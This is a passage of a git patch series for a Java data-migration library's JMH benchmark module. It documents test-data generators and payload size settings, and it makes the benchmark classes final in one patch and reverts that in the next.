+ * }
+ * }
*
* @author Erik Pförtner
+ * @see PayloadSize
+ * @see BenchmarkBootstrap
+ * @see de.splatgames.aether.datafixers.testkit.TestDataBuilder
* @since 1.0.0
*/
public final class BenchmarkDataGenerator {
+ /**
+ * Private constructor to prevent instantiation.
+ */
private BenchmarkDataGenerator() {
// Utility class
}
/**
- * Generates benchmark data with the specified payload size.
+ * Generates benchmark data with the specified payload size and complexity.
*
- *
Creates a complex object structure including:
+ *
Creates a complex object structure including:
*
- *
Primitive fields (strings, integers, booleans)
- *
Nested objects up to the configured depth
- *
A list with the configured number of items
+ *
Primitive fields: String, integer, and boolean fields based on
+ * {@link PayloadSize#getFieldCount()}
+ *
Nested objects: Recursive nesting up to
+ * {@link PayloadSize#getNestingDepth()} levels
+ *
List with items: An "items" array with
+ * {@link PayloadSize#getListSize()} objects
*
*
- * @param ops the DynamicOps to use for data creation
- * @param size the payload size configuration
- * @param the underlying value type
- * @return a new Dynamic containing the generated data
+ *
Field Naming Patterns
+ *
+ *
Field Type
Pattern
Example
+ *
String
{@code stringFieldN}
{@code stringField0: "value0"}
+ *
Integer
{@code intFieldN}
{@code intField0: 0}
+ *
Boolean
{@code boolFieldN}
{@code boolField0: true}
+ *
+ *
+ * @param ops the DynamicOps implementation to use for data creation
+ * @param size the payload size configuration controlling data complexity
+ * @param the underlying value type of the DynamicOps
+ * @return a new Dynamic containing the generated benchmark data
*/
@NotNull
- public static Dynamic generate(
- @NotNull final DynamicOps ops,
- @NotNull final PayloadSize size
- ) {
+ public static Dynamic generate(@NotNull final DynamicOps ops,
+ @NotNull final PayloadSize size) {
final TestDataBuilder builder = TestData.using(ops).object();
// Add primitive fields
@@ -93,18 +177,39 @@ public static Dynamic generate(
/**
* Generates a player-like data structure for realistic migration benchmarks.
*
- *
Creates a structure similar to game player data with:
- *
- *
Identity fields (id, name)
- *
Stats (level, experience, health)
- *
Position object (x, y, z, world)
- *
Inventory list
- *
Achievements list
- *
+ *
Creates a structure simulating game player data, useful for domain-specific
+ * migration testing with {@link BenchmarkBootstrap#createPlayerFixer()}.
*
- * @param ops the DynamicOps to use for data creation
- * @param the underlying value type
- * @return a new Dynamic containing player-like data
+ *
Data Characteristics
+ *
+ *
Component
Count
Description
+ *
Top-level fields
6
id, name, level, experience, health, active
+ *
Nested objects
2
position (4 fields), stats (4 fields)
+ *
Inventory slots
36
Standard inventory size
+ *
Achievements
6
String list
+ *
+ *
+ * @param ops the DynamicOps implementation to use for data creation
+ * @param the underlying value type of the DynamicOps
+ * @return a new Dynamic containing player-like benchmark data
+ * @see BenchmarkBootstrap#createPlayerFixer()
+ * @see BenchmarkBootstrap#PLAYER_TYPE
*/
@NotNull
public static Dynamic generatePlayerData(@NotNull final DynamicOps ops) {
@@ -147,18 +252,32 @@ public static Dynamic generatePlayerData(@NotNull final DynamicOps ops
}
/**
- * Generates a simple flat object for basic operation benchmarks.
+ * Generates a simple flat object with only string fields.
+ *
+ *
Creates a minimal object structure without nesting or lists, useful for
+ * benchmarking basic field access and manipulation operations with minimal traversal overhead.
*
- * @param ops the DynamicOps to use for data creation
- * @param fieldCount the number of fields to generate
- * @param the underlying value type
- * @return a new Dynamic containing flat data
+ *
This method is useful for isolating field operation costs from
+ * structural complexity overhead.
+ *
+ * @param ops the DynamicOps implementation to use for data creation
+ * @param fieldCount the number of string fields to generate (field0 through field(n-1))
+ * @param the underlying value type of the DynamicOps
+ * @return a new Dynamic containing a flat object with string fields
*/
@NotNull
- public static Dynamic generateFlat(
- @NotNull final DynamicOps ops,
- final int fieldCount
- ) {
+ public static Dynamic generateFlat(@NotNull final DynamicOps ops,
+ final int fieldCount) {
final TestDataBuilder builder = TestData.using(ops).object();
for (int i = 0; i < fieldCount; i++) {
builder.put("field" + i, "value" + i);
@@ -166,11 +285,25 @@ public static Dynamic generateFlat(
return builder.build();
}
- private static void addNestedObject(
- final TestDataBuilder builder,
- final String key,
- final int depth
- ) {
+ /**
+ * Recursively adds nested object structures to the builder.
+ *
+ *
Creates a chain of nested objects, each containing:
+ *
+ *
{@code level} - the current nesting depth
+ *
{@code data} - a string identifying the nesting level
+ *
{@code timestamp} - current system time (for data variation)
+ *
{@code child} - the next nested level (if depth > 0)
+ *
+ *
+ * @param builder the TestDataBuilder to add the nested structure to
+ * @param key the field name for this nested object
+ * @param depth remaining nesting levels (stops when depth reaches 0)
+ * @param the underlying value type of the builder
+ */
+ private static void addNestedObject(final TestDataBuilder builder,
+ final String key,
+ final int depth) {
if (depth <= 0) {
return;
}
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/PayloadSize.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/PayloadSize.java
index 82fe8a3..13b56f3 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/PayloadSize.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/PayloadSize.java
@@ -23,42 +23,144 @@
package de.splatgames.aether.datafixers.benchmarks.util;
/**
- * Defines payload sizes for benchmark test data generation.
+ * Defines payload size configurations for benchmark test data generation.
+ *
+ *
This enum controls the complexity of data generated by
+ * {@link BenchmarkDataGenerator#generate(de.splatgames.aether.datafixers.api.dynamic.DynamicOps, PayloadSize)}.
+ * Each configuration specifies three dimensions of data complexity:
*
- *
Each size configuration controls the complexity of generated test data:
*
- *
SMALL - Quick benchmarks, minimal data (5 fields, 2 nesting levels, 10 list items)
- *
MEDIUM - Balanced benchmarks (20 fields, 4 nesting levels, 100 list items)
- *
LARGE - Stress testing (50 fields, 6 nesting levels, 1000 list items)
+ *
Field count: Number of primitive fields (string, int, boolean triplets)
+ *
Nesting depth: Levels of nested object recursion
+ *
List size: Number of items in the generated list
*
*
+ *
Configuration Summary
+ *
+ *
+ *
Size
+ *
Fields
+ *
Nesting
+ *
List Items
+ *
Use Case
+ *
+ *
+ *
{@link #SMALL}
+ *
5
+ *
2 levels
+ *
10
+ *
Quick iterations, CI pipelines
+ *
+ *
+ *
{@link #MEDIUM}
+ *
20
+ *
4 levels
+ *
100
+ *
Typical performance testing
+ *
+ *
+ *
{@link #LARGE}
+ *
50
+ *
6 levels
+ *
1000
+ *
Stress testing, worst-case analysis
+ *
+ *
+ *
+ *
JMH Parameterization
+ *
This enum is designed for use with JMH's {@code @Param} annotation:
+ *
* @author Erik Pförtner
+ * @see BenchmarkDataGenerator
* @since 1.0.0
*/
public enum PayloadSize {
/**
- * Small payload: 5 fields, 2 nesting levels, 10 list items.
- * Suitable for quick benchmark iterations.
+ * Small payload configuration for quick benchmark iterations.
+ *
+ *
Generates minimal data suitable for:
+ *
+ *
Rapid development feedback loops
+ *
CI/CD pipeline validation
+ *
Baseline measurements with minimal GC impact
+ *
+ *
+ *
Configuration: 5 fields, 2 nesting levels, 10 list items
*/
SMALL(5, 2, 10),
/**
- * Medium payload: 20 fields, 4 nesting levels, 100 list items.
- * Balanced for typical performance testing.
+ * Medium payload configuration for balanced performance testing.
+ *
+ *
Generates moderately complex data suitable for:
+ *
+ *
Standard benchmark runs
+ *
Typical real-world data volume simulation
+ *
Comparing different implementations
+ *
+ *
+ *
Configuration: 20 fields, 4 nesting levels, 100 list items
*/
MEDIUM(20, 4, 100),
/**
- * Large payload: 50 fields, 6 nesting levels, 1000 list items.
- * Suitable for stress testing and worst-case analysis.
+ * Large payload configuration for stress testing and worst-case analysis.
+ *
+ *
Generates substantial data suitable for:
+ *
+ *
Memory pressure and GC behavior analysis
+ *
Worst-case performance scenarios
+ *
Scalability limit identification
+ *
+ *
+ *
Configuration: 50 fields, 6 nesting levels, 1000 list items
+ *
+ *
Note: Large payloads may require increased heap size and longer
+ * warmup periods for stable measurements.
*/
LARGE(50, 6, 1000);
+ /**
+ * Number of primitive field triplets (string, int, boolean) to generate.
+ */
private final int fieldCount;
+
+ /**
+ * Maximum depth of nested object recursion.
+ */
private final int nestingDepth;
+
+ /**
+ * Number of items in the generated list.
+ */
private final int listSize;
+ /**
+ * Constructs a payload size configuration.
+ *
+ * @param fieldCount number of top-level field triplets
+ * @param nestingDepth maximum nesting levels for nested objects
+ * @param listSize number of items in generated lists
+ */
PayloadSize(final int fieldCount, final int nestingDepth, final int listSize) {
this.fieldCount = fieldCount;
this.nestingDepth = nestingDepth;
@@ -66,27 +168,39 @@ public enum PayloadSize {
}
/**
- * Returns the number of top-level fields to generate.
+ * Returns the number of primitive field triplets to generate.
*
- * @return the field count
+ *
Each field "count" results in three actual fields:
+ *
+ *
{@code stringFieldN} - String value
+ *
{@code intFieldN} - Integer value
+ *
{@code boolFieldN} - Boolean value
+ *
+ *
+ * @return the number of field triplets (total fields = fieldCount × 3)
*/
public int getFieldCount() {
return this.fieldCount;
}
/**
- * Returns the maximum nesting depth for nested objects.
+ * Returns the maximum nesting depth for recursive nested objects.
+ *
+ *
A depth of N creates N levels of nested objects, each containing
+ * a "child" field pointing to the next level until depth reaches 0.
*
- * @return the nesting depth
+ * @return the maximum nesting depth (0 = no nesting)
*/
public int getNestingDepth() {
return this.nestingDepth;
}
/**
- * Returns the number of items to generate in lists.
+ * Returns the number of items to generate in the "items" list.
+ *
+ *
Each item is an object with id, quantity, and active fields.
*
- * @return the list size
+ * @return the number of list items
*/
public int getListSize() {
return this.listSize;
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/package-info.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/package-info.java
new file mode 100644
index 0000000..5673ed4
--- /dev/null
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/package-info.java
@@ -0,0 +1,138 @@
+/*
+ * Copyright (c) 2026 Splatgames.de Software and Contributors
+ *
+ * Permission is hereby granted, free of charge, to any person obtaining a copy
+ * of this software and associated documentation files (the "Software"), to deal
+ * in the Software without restriction, including without limitation the rights
+ * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+ * copies of the Software, and to permit persons to whom the Software is
+ * furnished to do so, subject to the following conditions:
+ *
+ * The above copyright notice and this permission notice shall be included in all
+ * copies or substantial portions of the Software.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+ * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+ * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+ * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+ * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+ * SOFTWARE.
+ */
+
+/**
+ * Utility classes for JMH benchmark infrastructure in the Aether DataFixers framework.
+ *
+ *
This package provides the foundational components that all benchmark classes depend on
+ * for test data generation, DataFixer configuration, and payload management. These utilities
+ * ensure consistent, reproducible benchmark conditions across different benchmark categories.
DataFixer Configurations
 + * {@link de.splatgames.aether.datafixers.benchmarks.util.BenchmarkBootstrap} provides
+ * several DataFixer configurations for different benchmark scenarios:
+ *
+ *
Configuration
Fix Count
Purpose
+ *
Single Fix
1
Baseline single-operation performance
+ *
Identity
1 (no-op)
Framework overhead measurement
+ *
Chain (N)
1-100
Chain length scaling analysis
+ *
Mixed (N)
4+
Realistic heterogeneous migrations
+ *
Player
4
Domain-specific scenario testing
+ *
+ *
+ *
Payload Size Configurations
+ *
{@link de.splatgames.aether.datafixers.benchmarks.util.PayloadSize} defines three
+ * complexity levels for generated test data:
+ *
+ *
Size
Fields
Nesting
List Items
Use Case
+ *
SMALL
5
2
10
Quick iterations, CI
+ *
MEDIUM
20
4
100
Standard testing
+ *
LARGE
50
6
1000
Stress testing
+ *
+ *
+ *
Integration with Testkit
+ *
This package builds upon the {@code aether-datafixers-testkit} module:
+ *
+ *
{@link de.splatgames.aether.datafixers.benchmarks.util.BenchmarkDataGenerator} uses
+ * {@code TestDataBuilder} for fluent data construction
Both utilities leverage {@code MockSchemas} for lightweight schema instances
+ *
+ *
+ * @see de.splatgames.aether.datafixers.benchmarks.util.BenchmarkBootstrap
+ * @see de.splatgames.aether.datafixers.benchmarks.util.BenchmarkDataGenerator
+ * @see de.splatgames.aether.datafixers.benchmarks.util.PayloadSize
+ * @see de.splatgames.aether.datafixers.testkit
+ * @since 1.0.0
+ */
+package de.splatgames.aether.datafixers.benchmarks.util;
From 0196f6d20a154ed18ab1a37f49dc9064395eed62 Mon Sep 17 00:00:00 2001
From: Erik
Date: Sat, 31 Jan 2026 17:23:53 +0100
Subject: [PATCH 24/39] Mark benchmark classes as `final` to prevent
 subclassing and improve clarity.
---
.../datafixers/benchmarks/codec/CollectionCodecBenchmark.java | 2 +-
.../datafixers/benchmarks/codec/PrimitiveCodecBenchmark.java | 2 +-
.../benchmarks/concurrent/ConcurrentMigrationBenchmark.java | 2 +-
.../datafixers/benchmarks/core/MultiFixChainBenchmark.java | 2 +-
.../datafixers/benchmarks/core/SchemaLookupBenchmark.java | 2 +-
.../aether/datafixers/benchmarks/core/SingleFixBenchmark.java | 2 +-
.../datafixers/benchmarks/format/CrossFormatBenchmark.java | 2 +-
.../aether/datafixers/benchmarks/format/JsonBenchmark.java | 2 +-
.../aether/datafixers/benchmarks/format/TomlXmlBenchmark.java | 2 +-
.../aether/datafixers/benchmarks/format/YamlBenchmark.java | 2 +-
10 files changed, 10 insertions(+), 10 deletions(-)
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/CollectionCodecBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/CollectionCodecBenchmark.java
index 56405aa..981d9ed 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/CollectionCodecBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/CollectionCodecBenchmark.java
@@ -146,7 +146,7 @@
@Warmup(iterations = 5, time = 1, timeUnit = TimeUnit.SECONDS)
@Measurement(iterations = 10, time = 1, timeUnit = TimeUnit.SECONDS)
@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"})
-public class CollectionCodecBenchmark {
+public final class CollectionCodecBenchmark {
/**
* The number of elements in test lists, injected by JMH.
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/PrimitiveCodecBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/PrimitiveCodecBenchmark.java
index 7e9c8da..15cd191 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/PrimitiveCodecBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/PrimitiveCodecBenchmark.java
@@ -147,7 +147,7 @@
@Warmup(iterations = 5, time = 1, timeUnit = TimeUnit.SECONDS)
@Measurement(iterations = 10, time = 1, timeUnit = TimeUnit.SECONDS)
@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"})
-public class PrimitiveCodecBenchmark {
+public final class PrimitiveCodecBenchmark {
/**
* Test boolean value for encoding benchmarks.
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/concurrent/ConcurrentMigrationBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/concurrent/ConcurrentMigrationBenchmark.java
index a1830bf..6b905ec 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/concurrent/ConcurrentMigrationBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/concurrent/ConcurrentMigrationBenchmark.java
@@ -157,7 +157,7 @@
@Warmup(iterations = 3, time = 2, timeUnit = TimeUnit.SECONDS)
@Measurement(iterations = 5, time = 2, timeUnit = TimeUnit.SECONDS)
@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"})
-public class ConcurrentMigrationBenchmark {
+public final class ConcurrentMigrationBenchmark {
// ==================== Concurrent Migration Benchmarks ====================
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/MultiFixChainBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/MultiFixChainBenchmark.java
index 2b3e535..d992f1a 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/MultiFixChainBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/MultiFixChainBenchmark.java
@@ -112,7 +112,7 @@
@Warmup(iterations = 5, time = 1, timeUnit = TimeUnit.SECONDS)
@Measurement(iterations = 10, time = 1, timeUnit = TimeUnit.SECONDS)
@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"})
-public class MultiFixChainBenchmark {
+public final class MultiFixChainBenchmark {
/**
* The number of fixes in the chain, injected by JMH.
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SchemaLookupBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SchemaLookupBenchmark.java
index 0b72395..daf9272 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SchemaLookupBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SchemaLookupBenchmark.java
@@ -109,7 +109,7 @@
@Warmup(iterations = 5, time = 1, timeUnit = TimeUnit.SECONDS)
@Measurement(iterations = 10, time = 1, timeUnit = TimeUnit.SECONDS)
@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"})
-public class SchemaLookupBenchmark {
+public final class SchemaLookupBenchmark {
/**
* Benchmarks exact version lookup performance.
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SingleFixBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SingleFixBenchmark.java
index c74d288..fad4f96 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SingleFixBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SingleFixBenchmark.java
@@ -101,7 +101,7 @@
@Warmup(iterations = 5, time = 1, timeUnit = TimeUnit.SECONDS)
@Measurement(iterations = 10, time = 1, timeUnit = TimeUnit.SECONDS)
@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"})
-public class SingleFixBenchmark {
+public final class SingleFixBenchmark {
/**
* Benchmarks a single field rename operation.
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/CrossFormatBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/CrossFormatBenchmark.java
index ac0bce9..2bc7504 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/CrossFormatBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/CrossFormatBenchmark.java
@@ -173,7 +173,7 @@
@Warmup(iterations = 5, time = 1, timeUnit = TimeUnit.SECONDS)
@Measurement(iterations = 10, time = 1, timeUnit = TimeUnit.SECONDS)
@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"})
-public class CrossFormatBenchmark {
+public final class CrossFormatBenchmark {
/**
* Payload size parameter controlling test data complexity.
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/JsonBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/JsonBenchmark.java
index d0f64b2..7cb3e74 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/JsonBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/JsonBenchmark.java
@@ -149,7 +149,7 @@
@Warmup(iterations = 5, time = 1, timeUnit = TimeUnit.SECONDS)
@Measurement(iterations = 10, time = 1, timeUnit = TimeUnit.SECONDS)
@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"})
-public class JsonBenchmark {
+public final class JsonBenchmark {
/**
* Field name used for read/write benchmarks.
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/TomlXmlBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/TomlXmlBenchmark.java
index 2dc134c..675e4eb 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/TomlXmlBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/TomlXmlBenchmark.java
@@ -150,7 +150,7 @@
@Warmup(iterations = 5, time = 1, timeUnit = TimeUnit.SECONDS)
@Measurement(iterations = 10, time = 1, timeUnit = TimeUnit.SECONDS)
@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"})
-public class TomlXmlBenchmark {
+public final class TomlXmlBenchmark {
/**
* Field name used for read/write benchmarks.
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/YamlBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/YamlBenchmark.java
index c0f2862..3e9009f 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/YamlBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/YamlBenchmark.java
@@ -147,7 +147,7 @@
@Warmup(iterations = 5, time = 1, timeUnit = TimeUnit.SECONDS)
@Measurement(iterations = 10, time = 1, timeUnit = TimeUnit.SECONDS)
@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"})
-public class YamlBenchmark {
+public final class YamlBenchmark {
/**
* Field name used for read/write benchmarks.
From 2096a6101fdce842450efc8c284d5f345736b566 Mon Sep 17 00:00:00 2001
From: Erik
Date: Sat, 31 Jan 2026 17:31:57 +0100
Subject: [PATCH 25/39] Make benchmark classes non-final again (JMH generates
 subclasses of benchmark classes, so they must not be `final`) and introduce
 consistent use of `@Nullable` annotations for improved clarity. Add a fixed
 timestamp for reproducible benchmarks in `BenchmarkDataGenerator`.
---
.../codec/CollectionCodecBenchmark.java | 2 +-
.../benchmarks/codec/PrimitiveCodecBenchmark.java | 2 +-
.../concurrent/ConcurrentMigrationBenchmark.java | 2 +-
.../benchmarks/core/MultiFixChainBenchmark.java | 2 +-
.../benchmarks/core/SchemaLookupBenchmark.java | 2 +-
.../benchmarks/core/SingleFixBenchmark.java | 2 +-
.../benchmarks/format/CrossFormatBenchmark.java | 2 +-
.../benchmarks/format/JsonBenchmark.java | 4 +++-
.../benchmarks/format/TomlXmlBenchmark.java | 2 +-
.../benchmarks/format/YamlBenchmark.java | 2 +-
.../benchmarks/util/BenchmarkDataGenerator.java | 15 +++++++++++----
11 files changed, 23 insertions(+), 14 deletions(-)
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/CollectionCodecBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/CollectionCodecBenchmark.java
index 981d9ed..56405aa 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/CollectionCodecBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/CollectionCodecBenchmark.java
@@ -146,7 +146,7 @@
@Warmup(iterations = 5, time = 1, timeUnit = TimeUnit.SECONDS)
@Measurement(iterations = 10, time = 1, timeUnit = TimeUnit.SECONDS)
@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"})
-public final class CollectionCodecBenchmark {
+public class CollectionCodecBenchmark {
/**
* The number of elements in test lists, injected by JMH.
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/PrimitiveCodecBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/PrimitiveCodecBenchmark.java
index 15cd191..7e9c8da 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/PrimitiveCodecBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/PrimitiveCodecBenchmark.java
@@ -147,7 +147,7 @@
@Warmup(iterations = 5, time = 1, timeUnit = TimeUnit.SECONDS)
@Measurement(iterations = 10, time = 1, timeUnit = TimeUnit.SECONDS)
@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"})
-public final class PrimitiveCodecBenchmark {
+public class PrimitiveCodecBenchmark {
/**
* Test boolean value for encoding benchmarks.
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/concurrent/ConcurrentMigrationBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/concurrent/ConcurrentMigrationBenchmark.java
index 6b905ec..a1830bf 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/concurrent/ConcurrentMigrationBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/concurrent/ConcurrentMigrationBenchmark.java
@@ -157,7 +157,7 @@
@Warmup(iterations = 3, time = 2, timeUnit = TimeUnit.SECONDS)
@Measurement(iterations = 5, time = 2, timeUnit = TimeUnit.SECONDS)
@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"})
-public final class ConcurrentMigrationBenchmark {
+public class ConcurrentMigrationBenchmark {
// ==================== Concurrent Migration Benchmarks ====================
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/MultiFixChainBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/MultiFixChainBenchmark.java
index d992f1a..2b3e535 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/MultiFixChainBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/MultiFixChainBenchmark.java
@@ -112,7 +112,7 @@
@Warmup(iterations = 5, time = 1, timeUnit = TimeUnit.SECONDS)
@Measurement(iterations = 10, time = 1, timeUnit = TimeUnit.SECONDS)
@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"})
-public final class MultiFixChainBenchmark {
+public class MultiFixChainBenchmark {
/**
* The number of fixes in the chain, injected by JMH.
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SchemaLookupBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SchemaLookupBenchmark.java
index daf9272..0b72395 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SchemaLookupBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SchemaLookupBenchmark.java
@@ -109,7 +109,7 @@
@Warmup(iterations = 5, time = 1, timeUnit = TimeUnit.SECONDS)
@Measurement(iterations = 10, time = 1, timeUnit = TimeUnit.SECONDS)
@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"})
-public final class SchemaLookupBenchmark {
+public class SchemaLookupBenchmark {
/**
* Benchmarks exact version lookup performance.
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SingleFixBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SingleFixBenchmark.java
index fad4f96..c74d288 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SingleFixBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SingleFixBenchmark.java
@@ -101,7 +101,7 @@
@Warmup(iterations = 5, time = 1, timeUnit = TimeUnit.SECONDS)
@Measurement(iterations = 10, time = 1, timeUnit = TimeUnit.SECONDS)
@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"})
-public final class SingleFixBenchmark {
+public class SingleFixBenchmark {
/**
* Benchmarks a single field rename operation.
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/CrossFormatBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/CrossFormatBenchmark.java
index 2bc7504..ac0bce9 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/CrossFormatBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/CrossFormatBenchmark.java
@@ -173,7 +173,7 @@
@Warmup(iterations = 5, time = 1, timeUnit = TimeUnit.SECONDS)
